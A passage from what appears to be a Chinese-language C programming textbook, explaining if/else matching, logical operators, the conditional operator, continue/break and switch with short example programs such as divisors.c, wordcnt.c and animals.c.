2000) bonus = 2; else if (score < 2500) 425 bonus = 4; else bonus = 6; (这可能是一个游戏程序的一部分,bonus表示下一局游戏获得的光子 炸弹或补给。) 对于编译器的限制范围,C99标准要求编译器最少支持127层套嵌。 7.2.4 else与if配对 如果程序中有许多if和else,编译器如何知道哪个if对应哪个else?例 如,考虑下面的程序段: if (number > 6) if (number < 12) printf("You're close!\n"); else printf("Sorry, you lose a turn!\n"); 何时打印Sorry, you lose a turn!?当number小于或等于6时,还是number大 于12时?换言之,else与第1个if还是第2个if匹配?答案是,else与第2个if匹 配。也就是说,输入的数字和匹配的响应如下: 数字    响应 5     None 10    You’re close! 426 15    Sorry, you lose a turn! 规则是,如果没有花括号,else与离它最近的if匹配,除非最近的if被花 括号括起来(见图7.2)。 图7.2 if else匹配的规则 注意:要缩进“语句”,“语句”可以是一条简单语句或复合语句。 427 第1个例子的缩进使得else看上去与第1个if相匹配,但是记住,编译器 是忽略缩进的。如果希望else与第1个if匹配,应该这样写: if (number > 6) { if (number < 12) printf("You're close!\n"); } else printf("Sorry, you lose a turn!\n"); 这样改动后,响应如下: 数字    响应 5     Sorry, you lose a turn! 10    You’re close! 15    None 7.2.5 多层嵌套的if语句 前面介绍的if...else if...else序列是嵌套if的一种形式,从一系列选项中选 择一个执行。有时,选择一个特定选项后又引出其他选择,这种情况可以使 用另一种嵌套 if。例如,程序可以使用 if else选择男女,if else的每个分支里 又包含另一个if else来区分不同收入的群体。 我们把这种形式的嵌套if应用在下面的程序中。给定一个整数,显示所 有能整除它的约数。如果没有约数,则报告该数是一个素数。 428 在编写程序的代码之前要先规划好。首先,要总体设计一下程序。为方 便起见,程序应该使用一个循环让用户能连续输入待测试的数。这样,测试 一个新的数字时不必每次都要重新运行程序。下面是我们为这种循环开发的 一个模型(伪代码): 提示用户输入数字 当scanf()返回值为1 分析该数并报告结果 提示用户继续输入 回忆一下在测试条件中使用scanf(),把读取数字和判断测试条件确定是 否结束循环合并在一起。 下一步,设计如何找出约数。也许最直接的方法是: for (div = 2; div < num; div++) if (num % div == 0) printf("%d is divisible by %d\n", num, div); 该循环检查2~num之间的所有数字,测试它们是否能被num整除。但 是,这个方法有点浪费时间。我们可以改进一下。例如,考虑如果144%2得 0,说明2是144的约数;如果144除以2得72,那么72也是144的一个约数。所 以,num % div测试成功可以获得两个约数。为了弄清其中的原理,我们分 析一下循环中得到的成对约数:2和72、2和48、4和36、6和24、8和18、9和 16、12和12、16和9、18和8,等等。在得到12和12这对约数后,又开始得到 已找到的相同约数(次序相反)。因此,不用循环到143,在达到12以后就 可以停止循环。这大大地节省了循环时间! 分析后发现,必须测试的数只要到num的平方根就可以了,不用到 num。对于9这样的数字,不会节约很多时间,但是对于10000这样的数,使 429 用哪一种方法求约数差别很大。不过,我们不用在程序中计算平方根,可以 这样编写测试条件: for (div = 2; (div * div) <= num; div++) if (num % div == 0) printf("%d is divisible by %d and %d.\n",num, div, num / div); 如果num是144,当div = 12时停止循环。如果num是145,当div = 13时停 止循环。 不使用平方根而用这样的测试条件,有两个原因。其一,整数乘法比求 平方根快。其二,我们还没有正式介绍平方根函数。 还要解决两个问题才能准备编程。第1个问题,如果待测试的数是一个 完全平方数怎么办?报告144可以被12和12整除显得有点傻。可以使用嵌套 if语句测试div是否等于num /div。如果是,程序只打印一个约数: for (div = 2; (div * div) <= num; div++) { if (num % div == 0) { if (div * div != num) printf("%d is divisible by %d and %d.\n",num, div, num / div); else printf("%d is divisible by %d.\n", num, div); } 430 } 注意 从技术角度看,if else语句作为一条单独的语句,不必使用花括号。外 层if也是一条单独的语句,也不必使用花括号。但是,当语句太长时,使用 花括号能提高代码的可读性,而且还可防止今后在if循环中添加其他语句时 忘记加花括号。 第2个问题,如何知道一个数字是素数?如果num是素数,程序流不会 进入if语句。要解决这个问题,可以在外层循环把一个变量设置为某个值 (如,1),然后在if语句中把该变量重新设置为0。循环完成后,检查该变 量是否是1,如果是,说明没有进入if语句,那么该数就是素数。这样的变 量通常称为标记(flag)。 一直以来,C都习惯用int作为标记的类型,其实新增的_Bool类型更合 适。另外,如果在程序中包含了stdbool.h头文件,便可用bool代替_Bool类 型,用true和false分别代替1和0。 程序清单7.5体现了以上分析的思路。为扩大该程序的应用范围,程序 用long类型而不是int类型(如果系统不支持_Bool类型,可以把isPrime的类 型改为int,并用1和0分别替换程序中的true和false)。 程序清单7.5 divisors.c程序 // divisors.c -- 使用嵌套if语句显示一个数的约数 #include <stdio.h> #include <stdbool.h> int main(void) { 431 unsigned long num;     // 待测试的数 unsigned long div;     // 可能的约数 bool isPrime;       // 素数标记 printf("Please enter an integer for analysis; "); printf("Enter q to quit.\n"); while (scanf("%lu", &num) == 1) { for (div = 2, isPrime = true; (div * div) <= num; div++) { if (num % div == 0) { if ((div * div) != num) printf("%lu is divisible by %lu and %lu.\n", num, div, num / div); else printf("%lu is divisible by %lu.\n", num, div); isPrime = false;  // 该数不是素数 } 432 } if (isPrime) printf("%lu is prime.\n", num); printf("Please enter another integer for analysis; "); printf("Enter q to quit.\n"); } printf("Bye.\n"); return 0; } 注意,该程序在for循环的测试表达式中使用了逗号运算符,这样每次 输入新值时都可以把isPrime设置为true。 下面是该程序的一个输出示例: Please enter an integer for analysis; Enter q to quit. 123456789 123456789 is divisible by 3 and 41152263. 123456789 is divisible by 9 and 13717421. 123456789 is divisible by 3607 and 34227. 123456789 is divisible by 3803 and 32463. 123456789 is divisible by 10821 and 11409. 433 Please enter another integer for analysis; Enter q to quit. 149 149 is prime. Please enter another integer for analysis; Enter q to quit. 2013 2013 is divisible by 3 and 671. 2013 is divisible by 11 and 183. 2013 is divisible by 33 and 61. Please enter another integer for analysis; Enter q to quit. q Bye. 该程序会把1认为是素数,其实它不是。下一节将要介绍的逻辑运算符 可以排除这种特殊的情况。 小结:用if语句进行选择 关键字:if、else 一般注解: 下面各形式中,statement可以是一条简单语句或复合语句。表达式为真 说明其值是非零值。 形式1: if (expression) 434 statement 如果expression为真,则执行statement部分。 形式2: if (expression) statement1 else statement2 如果expression为真,执行statement1部分;否则,执行statement2部分。 形式3: if (expression1) statement1 else if (expression2) statement2 else statement3 如果expression1为真,执行statement1部分;如果expression2为真,执行 statement2部分;否则,执行statement3部分。 示例: if (legs == 4) 435 printf("It might be a horse.\n"); else if (legs > 4) printf("It is not a horse.\n"); else   /* 如果legs < 4 */ { legs++; printf("Now it has one more leg.\n"); } 436 7.3 逻辑运算符 读者已经很熟悉了,if 语句和 while 语句通常使用关系表达式作为测试 条件。有时,把多个关系表达式组合起来会很有用。例如,要编写一个程 序,计算输入的一行句子中除单引号和双引号以外其他字符的数量。这种情 况下可以使用逻辑运算符,并使用句点(.)标识句子的末尾。程序清单7.6 用一个简短的程序进行演示。 程序清单7.6 chcount.c程序 // chcount.c -- 使用逻辑与运算符 #include <stdio.h> #define PERIOD '.' int main(void) { char ch; int charcount = 0; while ((ch = getchar()) != PERIOD) { if (ch != '"' && ch != '\'') charcount++; } printf("There are %d non-quote characters.\n", charcount); 437 return 0; } 下面是该程序的一个输出示例: I didn't read the "I'm a Programming Fool" best seller. There are 50 non-quote characters. 程序首先读入一个字符,并检查它是否是一个句点,因为句点标志一个 句子的结束。接下来,if语句的测试条件中使用了逻辑与运算符&&。该 if 语句翻译成文字是“如果待测试的字符不是双引号,并且它也不是单引号, 那么charcount递增1”。 逻辑运算符两侧的条件必须都为真,整个表达式才为真。逻辑运算符的 优先级比关系运算符低,所以不必在子表达式两侧加圆括号。 C有3种逻辑运算符,见表7.3。 表7.3 种逻辑运算符 假设exp1和exp2是两个简单的关系表达式(如car > rat或debt == 1000),那么: 当且仅当exp1和exp2都为真时,exp1 && exp2才为真; 如果exp1或exp2为真,则exp1 || exp2为真; 如果exp1为假,则!exp1为真;如果exp1为真,则!exp1为假。 下面是一些具体的例子: 438 5 > 2 && 4 > 7为假,因为只有一个子表达式为真; 5 > 2 || 4 > 7为真,因为有一个子表达式为真; !(4 > 7)为真,因为4不大于7。 顺带一提,最后一个表达式与下面的表达式等价: 4 <= 7 如果不熟悉逻辑运算符或者觉得很别扭,请记住:(练习&&时间)== 完 美。 7.3.1 备选拼写:iso646.h头文件 C 是在美国用标准美式键盘开发的语言。但是在世界各地,并非所有的 键盘都有和美式键盘一样的符号。因此,C99标准新增了可代替逻辑运算符 的拼写,它们被定义在ios646.h头文件中。如果在程序中包含该头文件,便 可用and代替&&、or代替||、not代替!。例如,可以把下面的代码: if (ch != '"' && ch != '\'') charcount++; 改写为: if (ch != '"' and ch != '\'') charcount++; 表7.4列出了逻辑运算符对应的拼写,很容易记。读者也许很好奇,为 何C不直接使用and、or和not?因为C一直坚持尽量保持较少的关键字。参考 资料V“新增C99和C11的标准ANSI C库”列出了一些运算符的备选拼写,有些 我们还没见过。 表7.4 逻辑运算符的备选拼写 439 7.3.2 优先级 !运算符的优先级很高,比乘法运算符还高,与递增运算符的优先级相 同,只比圆括号的优先级低。&&运算符的优先级比||运算符高,但是两者的 优先级都比关系运算符低,比赋值运算符高。因此,表达式a >b && b > c || b > d相当于((a > b) && (b > c)) || (b > d)。 也就是说,b介于a和c之间,或者b大于d。 尽管对于该例没必要使用圆括号,但是许多程序员更喜欢使用带圆括号 的第 2 种写法。这样做即使不记得逻辑运算符的优先级,表达式的含义也很 清楚。 7.3.3 求值顺序 除了两个运算符共享一个运算对象的情况外,C 通常不保证先对复杂表 达式中哪部分求值。例如,下面的语句,可能先对表达式5 + 3求值,也可 能先对表达式9 + 6求值: apples = (5 + 3) * (9 + 6); C 把先计算哪部分的决定权留给编译器的设计者,以便针对特定系统优 化设计。但是,对于逻辑运算符是个例外,C保证逻辑表达式的求值顺序是 从左往右。&&和||运算符都是序列点,所以程序在从一个运算对象执行到下 一个运算对象之前,所有的副作用都会生效。而且,C 保证一旦发现某个元 素让整个表达式无效,便立即停止求值。正是由于有这些规定,才能写出这 样结构的代码: while ((c = getchar()) != ' ' && c != '\n') 440 如上代码所示,读取字符直至遇到第1 个空格或换行符。第1 个子表达 式把读取的值赋给c,后面的子表达式会用到c的值。如果没有求值循序的保 证,编译器可能在给c赋值之前先对后面的表达式求值。 这里还有一个例子: if (number != 0 && 12/number == 2) printf("The number is 5 or 6.\n"); 如果number的值是0,那么第1个子表达式为假,且不再对关系表达式求 值。这样避免了把0作为除数。许多语言都没有这种特性,知道number为0 后,仍继续检查后面的条件。 最后,考虑这个例子: while ( x++ < 10 && x + y < 20) 实际上,&&是一个序列点,这保证了在对&&右侧的表达式求值之前, 已经递增了x。 小结:逻辑运算符和表达式 逻辑运算符: 逻辑运算符的运算对象通常是关系表达式。!运算符只需要一个运算对 象,其他两个逻辑运算符都需要两个运算对象,左侧一个,右侧一个。 逻辑表达式: 441 当且仅当expression1和expression2都为真,expression1 && expression2才 为真。如果 expression1 或 expression2 为真,expression1 || expression2 为 真。如果expression为假,!expression则为真,反之亦然。 求值顺序: 逻辑表达式的求值顺序是从左往右。一旦发现有使整个表达式为假的因 素,立即停止求值。 示例: 6 > 2 && 3 == 3     真 !(6 > 2 && 3 == 3)   假 x != 0 && (20 / x) < 5 只有当x不等于0时,才会对第2个表达式求值 7.3.4 范围 &&运算符可用于测试范围。例如,要测试score是否在90~100的范围 内,可以这样写: if (range >= 90 && range <= 100) printf("Good show!\n"); 千万不要模仿数学上的写法: if (90 <= range <= 100)  // 千万不要这样写! printf("Good show!\n"); 这样写的问题是代码有语义错误,而不是语法错误,所以编译器不会捕 获这样的问题(虽然可能会给出警告)。由于<=运算符的求值顺序是从左 往右,所以编译器把测试表达式解释为: 442 (90 <= range) <= 100 子表达式90 <= range的值要么是1(为真),要么是0(为假)。这两个 值都小于100,所以不管range的值是多少,整个表达式都恒为真。因此,在 范围测试中要使用&&。 许多代码都用范围测试来确定一个字符是否是小写字母。例如,假设ch 是char类型的变量: if (ch >= 'a' && ch <= 'z') printf("That's a lowercase character.\n"); 该方法仅对于像ASCII这样的字符编码有效,这些编码中相邻字母与相 邻数字一一对应。但是,对于像EBCDIC这样的代码就没用了。相应的可移 植方法是,用ctype.h系列中的islower()函数(参见表7.1): if (islower(ch)) printf("That's a lowercase character.\n"); 无论使用哪种特定的字符编码,islower()函数都能正常运行(不过,一 些早期的编译器没有ctype.h系列)。 443 7.4 一个统计单词的程序 现在,我们可以编写一个统计单词数量的程序(即,该程序读取并报告 单词的数量)。该程序还可以计算字符数和行数。先来看看编写这样的程序 要涉及那些内容。 首先,该程序要逐个字符读取输入,知道何时停止读取。然后,该程序 能识别并计算这些内容:字符、行数和单词。据此我们编写的伪代码如下: 读取一个字符 当有更多输入时 递增字符计数 如果读完一行,递增行数计数 如果读完一个单词,递增单词计数 读取下一个字符 前面有一个输入循环的模型: while ((ch = getchar()) != STOP) { ... } 这里,STOP表示能标识输入末尾的某个值。以前我们用过换行符和句 点标记输入的末尾,但是对于一个通用的统计单词程序,它们都不合适。我 们暂时选用一个文本中不常用的字符(如,|)作为输入的末尾标记。第8章 中会介绍更好的方法,以便程序既能处理文本文件,又能处理键盘输入。 444 现在,我们考虑循环体。因为该程序使用getchar()进行输入,所以每次 迭代都要通过递增计数器来计数。为了统计行数,程序要能检查换行字符。 如果输入的字符是一个换行符,该程序应该递增行数计数器。这里要注意 STOP 字符位于一行的中间的情况。是否递增行数计数?我们可以作为特殊 行计数,即没有换行符的一行字符。可以通过记录之前读取的字符识别这种 情况,即如果读取时发现 STOP 字符的上一个字符不是换行符,那么这行就 是特殊行。 最棘手的部分是识别单词。首先,必须定义什么是该程序识别的单词。 我们用一个相对简单的方法,把一个单词定义为一个不含空白(即,没有空 格、制表符或换行符)的字符序列。因此,“glymxck”和“r2d2”都算是一个单 词。程序读取的第 1 个非空白字符即是一个单词的开始,当读到空白字符时 结束。判断非空白字符最直接的测试表达式是: c != ' ' && c != '\n' && c != '\t' /* 如果c不是空白字符,该表达式为真*/ 检测空白字符最直接的测试表达式是: c == ' ' || c == '\n' || c == '\t' /*如果c是空白字符,该表达式为真*/ 然而,使用ctype.h头文件中的函数isspace()更简单,如果该函数的参数 是空白字符,则返回真。所以,如果c是空白字符,isspace(c)为真;如果c不 是空白字符,!isspace(c)为真。 要查找一个单词里是否有某个字符,可以在程序读入单词的首字符时把 一个标记(名为 inword)设置为1。也可以在此时递增单词计数。然后,只 要inword为1(或true),后续的非空白字符都不记为单词的开始。下一个空 白字符,必须重置标记为0(或false),然后程序就准备好读取下一个单 词。我们把以上分析写成伪代码: 如果c不是空白字符,且inword为假 设置inword为真,并给单词计数 445 如果c是空白字符,且inword为真 设置inword为假 这种方法在读到每个单词的开头时把inword设置为1(真),在读到每 个单词的末尾时把inword设置为0(假)。只有在标记从0设置为1时,递增 单词计数。如果能使用_Bool类型,可以在程序中包含stdbool.h头文件,把 inword的类型设置为bool,其值用true和false表示。如果编译器不支持这种 用法,就把inword的类型设置为int,其值用1和0表示。 如果使用布尔类型的变量,通常习惯把变量自身作为测试条件。如下所 示: 用if (inword)代替if (inword == true) 用if (!inword)代替if (inword == false) 可以这样做的原因是,如果 inword为true,则表达式 inword == true为 true;如果 inword为false,则表达式inword == true为false。所以,还不如直 接用inword作为测试条件。类似地,!inword的值与表达式inword == false的 值相同(非真即false,非假即true)。 程序清单7.7把上述思路(识别行、识别不完整的行和识别单词)翻译 了成C代码。 程序清单7.7 wordcnt.c程序 // wordcnt.c -- 统计字符数、单词数、行数 #include <stdio.h> #include <ctype.h>     // 为isspace()函数提供原型 #include <stdbool.h>    // 为bool、true、false提供定义 446 #define STOP '|' int main(void) { char c;        // 读入字符 char prev;       // 读入的前一个字符 long n_chars = 0L;// 字符数 int n_lines = 0;    // 行数 int n_words = 0;    // 单词数 int p_lines = 0;    // 不完整的行数 bool inword = false;  // 如果c在单词中,inword 等于 true printf("Enter text to be analyzed (| to terminate):\n"); prev = '\n';      // 用于识别完整的行 while ((c = getchar()) != STOP) { n_chars++;     // 统计字符 if (c == '\n') n_lines++;   // 统计行 if (!isspace(c) && !inword) { 447 inword = true;// 开始一个新的单词 n_words++;   // 统计单词 } if (isspace(c) && inword) inword = false;  // 打到单词的末尾 prev = c;     // 保存字符的值 } if (prev != '\n') p_lines = 1; printf("characters = %ld, words = %d, lines = %d, ", n_chars, n_words, n_lines); printf("partial lines = %d\n", p_lines); return 0; } 下面是运行该程序后的一个输出示例: Enter text to be analyzed (| to terminate): Reason is a powerful servant but an inadequate master. 448 | characters = 55, words = 9, lines = 3, partial lines = 0 该程序使用逻辑运算符把伪代码翻译成C代码。例如,把下面的伪代 码: 如果c不是空白字符,且inword为假 翻译成如下C代码: if (!isspace(c) &&!inword) 再次提醒读者注意,!inword 与 inword == false 等价。上面的整个测试 条件比单独判断每个空白字符的可读性高: if (c != ' ' && c != '\n' && c != '\t' && !inword) 上面的两种形式都表示“如果c不是空白字符,且如果c不在单词里”。如 果两个条件都满足,则一定是一个新单词的开头,所以要递增n_words。如 果位于单词中,满足第1个条件,但是inword为true,就不递增 n_word。当 读到下一个空白字符时,inword 被再次设置为 false。检查代码,查看一下 如果单词之间有多个空格时,程序是否能正常运行。第 8 章讲解了如何修正 这个问题,让该程序能统计文件中的单词量。 449 7.5 条件运算符:?: C提供条件表达式(conditional expression)作为表达if else语句的一种 便捷方式,该表达式使用?:条件运算符。该运算符分为两部分,需要 3 个运 算对象。回忆一下,带一个运算对象的运算符称为一元运算符,带两个运算 对象的运算符称为二元运算符。以此类推,带 3 个运算对象的运算符称为三 元运算符。条件运算符是C语言中唯一的三元运算符。下面的代码得到一个 数的绝对值: x = (y < 0) ? -y : y; 在=和;之间的内容就是条件表达式,该语句的意思是“如果y小于0,那 么x = -y;否则,x = y”。用if else可以这样表达: if (y < 0) x = -y; else x = y; 条件表达式的通用形式如下: expression1 ? expression2 : expression3 如果 expression1 为真(非 0),那么整个条件表达式的值与 expression2 的值相同;如果expression1为假(0),那么整个条件表达式的值与 expression3的值相同。 需要把两个值中的一个赋给变量时,就可以用条件表达式。典型的例子 是,把两个值中的最大值赋给变量: max = (a > b) ? a : b; 450 如果a大于b,那么将max设置为a;否则,设置为b。 通常,条件运算符完成的任务用 if else 语句也可以完成。但是,使用条 件运算符的代码更简洁,而且编译器可以生成更紧凑的程序代码。 我们来看程序清单7.8中的油漆程序,该程序计算刷给定平方英尺的面 积需要多少罐油漆。基本算法很简单:用平方英尺数除以每罐油漆能刷的面 积。但是,商店只卖整罐油漆,不会拆分来卖,所以如果计算结果是1.7 罐,就需要两罐。因此,该程序计算得到带小数的结果时应该进1。条件运 算符常用于处理这种情况,而且还要根据单复数分别打印can和cans。 程序清单7.8 paint.c程序 /* paint.c -- 使用条件运算符 */ #include <stdio.h> #define COVERAGE 350   // 每罐油漆可刷的面积(单位:平方英 尺) int main(void) { int sq_feet; int cans; printf("Enter number of square feet to be painted:\n"); while (scanf("%d", &sq_feet) == 1) { cans = sq_feet / COVERAGE; 451 cans += ((sq_feet % COVERAGE == 0)) ? 0 : 1; printf("You need %d %s of paint.\n", cans, cans == 1 ? "can" : "cans"); printf("Enter next value (q to quit):\n"); } return 0; } 下面是该程序的运行示例: Enter number of square feet to be painted: 349 You need 1 can of paint. Enter next value (q to quit): 351 You need 2 cans of paint. Enter next value (q to quit): q 该程序使用的变量都是int类型,除法的计算结果(sq_feet / COVERAGE)会被截断。也就是说, 351/350得1。所以,cans被截断成整 数部分。如果sq_feet % COVERAGE得0,说明sq_feet被COVERAGE整除, cans的值不变;否则,肯定有余数,就要给cans加1。这由下面的语句完成: 452 cans += ((sq_feet % COVERAGE == 0)) ? 0 : 1; 该语句把+=右侧表达式的值加上cans,再赋给cans。右侧表达式是一个 条件表达式,根据sq_feet是否能被COVERAGE整除,其值为0或1。 printf()函数中的参数也是一个条件表达式: cans == 1 ? "can" : "cans"); 如果cans的值是1,则打印can;否则,打印cans。这也说明了条件运算 符的第2个和第3个运算对象可以是字符串。 小结:条件运算符 条件运算符:?: 一般注解: 条件运算符需要3个运算对象,每个运算对象都是一个表达式。其通用 形式如下: expression1 ? expression2 : expression3 如果expression1为真,整个条件表达式的值是expression2的值;否则, 是expression3的值。 示例: (5 > 3) ? 1 : 2 值为1 (3 > 5) ? 1 : 2 值为2 (a > b) ? a : b 如果a >b,则取较大的值 453 7.6 循环辅助:continue和break 一般而言,程序进入循环后,在下一次循环测试之前会执行完循环体中 的所有语句。continue 和break语句可以根据循环体中的测试结果来忽略一部 分循环内容,甚至结束循环。 7.6.1 continue语句 3种循环都可以使用continue语句。执行到该语句时,会跳过本次迭代的 剩余部分,并开始下一轮迭代。如果continue语句在嵌套循环内,则只会影 响包含该语句的内层循环。程序清单7.9中的简短程序演示了如何使用 continue。 程序清单7.9 skippart.c程序 /* skippart.c -- 使用continue跳过部分循环 */ #include <stdio.h> int main(void) { const float MIN = 0.0f; const float MAX = 100.0f; float score; float total = 0.0f; int n = 0; float min = MAX; 454 float max = MIN; printf("Enter the first score (q to quit): "); while (scanf("%f", &score) == 1) { if (score < MIN || score > MAX) { printf("%0.1f is an invalid value.Try again: ",score); continue;  // 跳转至while循环的测试条件 } printf("Accepting %0.1f:\n", score); min = (score < min) ? score : min; max = (score > max) ? score : max; total += score; n++; printf("Enter next score (q to quit): "); } if (n > 0) { printf("Average of %d scores is %0.1f.\n", n, total / n); 455 printf("Low = %0.1f, high = %0.1f\n", min, max); } else printf("No valid scores were entered.\n"); return 0; } 在程序清单7.9中,while循环读取输入,直至用户输入非数值数据。循 环中的if语句筛选出无效的分数。假设输入 188,程序会报告:188 is an invalid value。在本例中,continue 语句让程序跳过处理有效输入部分的代 码。程序开始下一轮循环,准备读取下一个输入值。 注意,有两种方法可以避免使用continue,一是省略continue,把剩余部 分放在一个else块中: if (score < 0 || score > 100) /* printf()语句 */ else { /* 语句*/ } 另一种方法是,用以下格式来代替: if (score >= 0 && score <= 100) 456 { /* 语句 */ } 这种情况下,使用continue的好处是减少主语句组中的一级缩进。当语 句很长或嵌套较多时,紧凑简洁的格式提高了代码的可读性。 continue还可用作占位符。例如,下面的循环读取并丢弃输入的数据, 直至读到行末尾: while (getchar() != '\n') ; 当程序已经读取一行中的某些内容,要跳至下一行开始处时,这种用法 很方便。问题是,一般很难注意到一个单独的分号。如果使用continue,可 读性会更高: while (getchar() != '\n') continue; 如果用了continue没有简化代码反而让代码更复杂,就不要使用 continue。例如,考虑下面的程序段: while ((ch = getchar() ) != '\n') { if (ch == '\t') continue; putchar(ch); 457 } 该循环跳过制表符,并在读到换行符时退出循环。以上代码这样表示更 简洁: while ((ch = getchar()) != '\n') if (ch != '\t') putchar(ch); 通常,在这种情况下,把if的测试条件的关系反过来便可避免使用 continue。 以上介绍了continue语句让程序跳过循环体的余下部分。那么,从何处 开始继续循环?对于while和 do while 循环,执行 continue 语句后的下一个 行为是对循环的测试表达式求值。考虑下面的循环: count = 0; while (count < 10) { ch = getchar(); if (ch == '\n') continue; putchar(ch); count++; } 458 该循环读取10个字符(除换行符外,因为当ch是换行符时,程序会跳过 count++;语句)并重新显示它们,其中不包括换行符。执行continue后,下一 个被求值的表达式是循环测试条件。 对于for循环,执行continue后的下一个行为是对更新表达式求值,然后 是对循环测试表达式求值。例如,考虑下面的循环: for (count = 0; count < 10; count++) { ch = getchar(); if (ch == '\n') continue; putchar(ch); } 该例中,执行完continue后,首先递增count,然后将递增后的值和10作 比较。因此,该循环与上面while循环的例子稍有不同。while循环的例子 中,除了换行符,其余字符都显示;而本例中,换行符也计算在内,所以读 取的10个字符中包含换行符。 7.6.2 break语句 程序执行到循环中的break语句时,会终止包含它的循环,并继续执行 下一阶段。把程序清单7.9中的continue替换成break,在输入188时,不是跳 至执行下一轮循环,而是导致退出当前循环。图7.3比较了break和continue。 如果break语句位于嵌套循环内,它只会影响包含它的当前循环。 459 图7.3 比较break和continue 460 break还可用于因其他原因退出循环的情况。程序清单7.10用一个循环计 算矩形的面积。如果用户输入非数字作为矩形的长或宽,则终止循环。 程序清单7.10 break.c程序 /* break.c -- 使用 break 退出循环 */ #include <stdio.h> int main(void) { float length, width; printf("Enter the length of the rectangle:\n"); while (scanf("%f", &length) == 1) { printf("Length = %0.2f:\n", length); printf("Enter its width:\n"); if (scanf("%f", &width) != 1) break; printf("Width = %0.2f:\n", width); printf("Area = %0.2f:\n", length * width); printf("Enter the length of the rectangle:\n"); } 461 printf("Done.\n"); return 0; } 可以这样控制循环: while (scanf("%f %f", &length, &width) == 2) 但是,用break可以方便显示用户输入的值。 和continue一样,如果用了break代码反而更复杂,就不要使用break。例 如,考虑下面的循环: while ((ch = getchar()) != '\n') { if (ch == '\t') break; putchar(ch); } 如果把两个测试条件放在一起,逻辑就更清晰了: while ((ch = getchar() ) != '\n' && ch != '\t') putchar(ch); break语句对于稍后讨论的switch语句而言至关重要。 在for循环中的break和continue的情况不同,执行完break语句后会直接执 行循环后面的第1条语句,连更新部分也跳过。嵌套循环内层的break只会让 462 程序跳出包含它的当前循环,要跳出外层循环还需要一个break: int p, q; scanf("%d", &p); while (p > 0) { printf("%d\n", p); scanf("%d", &q); while (q > 0) { printf("%d\n", p*q); if (q > 100) break; // 跳出内层循环 scanf("%d", &q); } if (q > 100) break; // 跳出外层循环 scanf("%d", &p); } 463 7.7 多重选择:switch和break 使用条件运算符和 if else 语句很容易编写二选一的程序。然而,有时程 序需要在多个选项中进行选择。可以用if else if...else来完成。但是,大多数 情况下使用switch语句更方便。程序清单7.11演示了如何使用switch语句。该 程序读入一个字母,然后打印出与该字母开头的动物名。 程序清单7.11 animals.c程序 /* animals.c -- 使用switch语句 */ #include <stdio.h> #include <ctype.h> int main(void) { char ch; printf("Give me a letter of the alphabet, and I will give "); printf("an animal name\nbeginning with that letter.\n"); printf("Please type in a letter; type # to end my act.\n"); while ((ch = getchar()) != '#') { if ('\n' == ch) continue; if (islower(ch))  /* 只接受小写字母*/ 464 switch (ch) { case 'a': printf("argali, a wild sheep of Asia\n"); break; case 'b': printf("babirusa, a wild pig of Malay\n"); break; case 'c': printf("coati, racoonlike mammal\n"); break; case 'd': printf("desman, aquatic, molelike critter\n"); break; case 'e': printf("echidna, the spiny anteater\n"); break; case 'f': printf("fisher, brownish marten\n"); 465 break; default: printf("That's a stumper!\n"); }        /* switch结束    */ else printf("I recognize only lowercase letters.\n"); while (getchar() != '\n') continue;   /* 跳过输入行的剩余部分 */ printf("Please type another letter or a #.\n"); }          /* while循环结束   */ printf("Bye!\n"); return 0; } 篇幅有限,我们只编到f,后面的字母以此类推。在进一步解释该程序 之前,先看看输出示例: Give me a letter of the alphabet, and I will give an animal name beginning with that letter. Please type in a letter; type # to end my act. a [enter] 466 argali, a wild sheep of Asia Please type another letter or a #. dab [enter] desman, aquatic, molelike critter Please type another letter or a #. r [enter] That's a stumper! Please type another letter or a #. Q [enter] I recognize only lowercase letters. Please type another letter or a #. # [enter] Bye! 该程序的两个主要特点是:使用了switch语句和它对输出的处理。我们 先分析switch的工作原理。 7.7.1 switch语句 要对紧跟在关键字 switch 后圆括号中的表达式求值。在程序清单 7.11 中,该表达式是刚输入给 ch的值。然后程序扫描标签(这里指,case 'a' :、 case 'b' :等)列表,直到发现一个匹配的值为止。然后程序跳转至那一行。 如果没有匹配的标签怎么办?如果有default :标签行,就跳转至该行;否 则,程序继续执行在switch后面的语句。 467 break语句在其中起什么作用?它让程序离开switch语句,跳至switch语 句后面的下一条语句(见图7.4)。如果没有break语句,就会从匹配标签开 始执行到switch末尾。例如,如果删除该程序中的所有break语句,运行程序 后输入d,其交互的输出结果如下: 468 图7.4 switch中有break和没有break的程序流 Give me a letter of the alphabet, and I will give an animal name 469 beginning with that letter. Please type in a letter; type # to end my act. d [enter] desman, aquatic, molelike critter echidna, the spiny anteater fisher, a brownish marten That's a stumper! Please type another letter or a #. # [enter] Bye! 如上所示,执行了从case 'd':到switch语句末尾的所有语句。 顺带一提,break语句可用于循环和switch语句中,但是continue只能用 于循环中。尽管如此,如果switch语句在一个循环中,continue便可作为 switch语句的一部分。这种情况下,就像在其他循环中一样,continue让程序 跳出循环的剩余部分,包括switch语句的其他部分。 如果读者熟悉Pascal,会发现switch语句和Pascal的case语句类似。它们 最大的区别在于,如果只希望处理某个带标签的语句,就必须在switch语句 中使用break语句。另外,C语言的case一般都指定一个值,不能使用一个范 围。 switch在圆括号中的测试表达式的值应该是一个整数值(包括char类 型)。case标签必须是整数类型(包括char类型)的常量或整型常量表达式 (即,表达式中只包含整型常量)。不能用变量作为case标签。switch的构 470 造如下: switch ( 整型表达式) { case 常量1: 语句   <--可选 case 常量2: 语句   <--可选 default :   <--可选 语句   <--可选 } 7.7.2 只读每行的首字符 animals.c(程序清单7.11)的另一个独特之处是它读取输入的方式。运 行程序时读者可能注意到了,当输入dab时,只处理了第1个字符。这种丢弃 一行中其他字符的行为,经常出现在响应单字符的交互程序中。可以用下面 的代码实现这样的行为: while (getchar() != '\n') continue;    /* 跳过输入行的其余部分 */ 循环从输入中读取字符,包括按下Enter键产生的换行符。注意,函数 的返回值并没有赋给ch,以上代码所做的只是读取并丢弃字符。由于最后丢 弃的字符是换行符,所以下一个被读取的字符是下一行的首字母。在外层的 while循环中,getchar()读取首字母并赋给ch。 471 假设用户一开始就按下Enter键,那么程序读到的首个字符就是换行 符。下面的代码处理这种情况: if (ch == '\n') continue; 7.7.3 多重标签 如程序清单7.12所示,可以在switch语句中使用多重case标签。 程序清单7.12 vowels.c程序 // vowels.c -- 使用多重标签 #include <stdio.h> int main(void) { char ch; int a_ct, e_ct, i_ct, o_ct, u_ct; a_ct = e_ct = i_ct = o_ct = u_ct = 0; printf("Enter some text; enter # to quit.\n"); while ((ch = getchar()) != '#') { switch (ch) { 472 case 'a': case 'A': a_ct++; break; case 'e': case 'E': e_ct++; break; case 'i': case 'I': i_ct++; break; case 'o': case 